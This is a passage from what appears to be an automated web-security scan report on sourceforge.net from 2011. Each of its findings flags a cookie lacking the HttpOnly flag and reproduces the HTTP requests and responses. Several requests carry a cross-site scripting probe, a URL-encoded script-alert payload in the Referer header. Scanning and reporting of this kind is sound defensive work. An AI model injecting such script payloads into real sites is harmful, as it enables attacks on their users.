Set-cookie: sf.consume=621ac5164e34c26aaa68843f57fb554daa5a9f96gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPFgcl1UOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 42

{"error": "No recommended releases found"}

2.8. http://sourceforge.net/projects/emule/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/emule/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/emule/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:48 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:48 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=a099b08b3a0a9a2f898b8887ed10fdfbec8c3260gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPAvECVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 592
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "a31156b8d80a68e8f4354c63e0747beb", "bytes": 3389035.0, "sf_file_id": 2960030, "filename": "/eMule/0.50a/eMul
...[SNIP]...

2.9. http://sourceforge.net/projects/filezilla/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/filezilla/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/filezilla/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:46 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=c8018b4446d2bf77e3788cfe895beaa904cc8b27gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BO7mZC1UOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 600
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "b344562bd80f93e0dba07ea9af60f86f", "bytes": 6786961.0, "sf_file_id": 4548531, "filename": "/FileZilla_Client
...[SNIP]...

2.10. http://sourceforge.net/projects/georaptor/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/georaptor/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/georaptor/ HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:11:54 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:11:54 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=d4fa2343ac25ac743e125505369900aa7706146dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037+1qaFVVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 30678
Access-Control-Allow-Origin: *

<!doctype html>
<!-- Server: sfs-consume-7 -->

<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]>
...[SNIP]...

2.11. http://sourceforge.net/projects/georaptor/reviews  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/georaptor/reviews

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/georaptor/reviews HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/georaptor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: project_details=hide; VISITOR=4dfbfb5886502b7c30001429; sf.consume=6cf2391deb77a213a619e18f4c71e6e2cf2b3088gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkZmJmYjU4ODY1MDJiN2MzMDAwMTQyOXEKVQNfaWRxC1UgNmEyYzEwOWUxYmQ1YTExYzU1ZTdiODQ1Mzg0ODgzMWRxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037+1hvs8lUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; __utmz=191645736.1308359518.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=191645736.453693884.1308359518.1308359518.1308359518.1; __utmb=191645736.1.10.1308359518; __utmc=191645736; ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; ki_t=1308359528446%3B1308359528446%3B1308359528446%3B1%3B1

Response

HTTP/1.1 302 Found
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:16:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:16:58 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=c7d333bed235ba3d4fd9264a7e595bc9215b7924gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/IrhTxVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Location: http://sourceforge.net/projects/georaptor/reviews/
Content-Length: 283
Access-Control-Allow-Origin: *

<html>
<head>
<title>302 Found</title>
</head>
<body>
<h1>302 Found</h1>
The resource was found at <a href="http://sourceforge.net/projects/georaptor/reviews/">http://sourceforge.net/projects
...[SNIP]...

2.12. http://sourceforge.net/projects/georaptor/reviews/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/georaptor/reviews/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/georaptor/reviews/ HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/georaptor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: project_details=hide; __utmz=191645736.1308359518.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=191645736.453693884.1308359518.1308359518.1308359518.1; __utmb=191645736.1.10.1308359518; __utmc=191645736; ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; ki_t=1308359528446%3B1308359528446%3B1308359528446%3B1%3B1; VISITOR=4dfbfb5886502b7c30001429; sf.consume=7d9208e416c459bc4aeff0a987593a39bb944f7dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/IrJlulUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:16:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:16:59 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=9f77813dee623d4bf9dc48e9738c2e6bbd968224gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/IuN4p1UOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 20585
Access-Control-Allow-Origin: *

<!doctype html>
<!-- Server: sfs-consume-3 -->

<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]>
...[SNIP]...

2.13. http://sourceforge.net/projects/gimp-win/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/gimp-win/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/gimp-win/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:47 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:47 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=1246f8a2dd8c630e219360c3d130c13ed7b7c445gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BO+rUb1UOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 717
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "0d7b94a9d8068caaf4fdd01d1c223c42", "bytes": 20039632.0, "sf_file_id": 3143714, "filename": "/GIMP + GTK+ (st
...[SNIP]...

2.14. http://sourceforge.net/projects/handbrake/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/handbrake/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/handbrake/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:49 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:49 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=374048c5abf3c494d69fa0d27c5a95293112f374gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPFDBg1UOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 589
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "acec2b35305642aef321de2c87c9f3af", "bytes": 6016464.0, "sf_file_id": 3549043, "filename": "/0.9.5/HandBrake-
...[SNIP]...

2.15. http://sourceforge.net/projects/megacubo-br/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/megacubo-br/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/megacubo-br/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:50 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:50 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=40362193ad7f0608566fd561cabb9c1e75ce5c7fgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPLZm+VUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 604
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "719d2b636a9453edc5498f0e1e9c8ac3", "bytes": 10129999.0, "sf_file_id": 4581427, "filename": "/megacubo-br/Meg
...[SNIP]...

2.16. http://sourceforge.net/projects/mingw/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/mingw/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/mingw/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:49 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
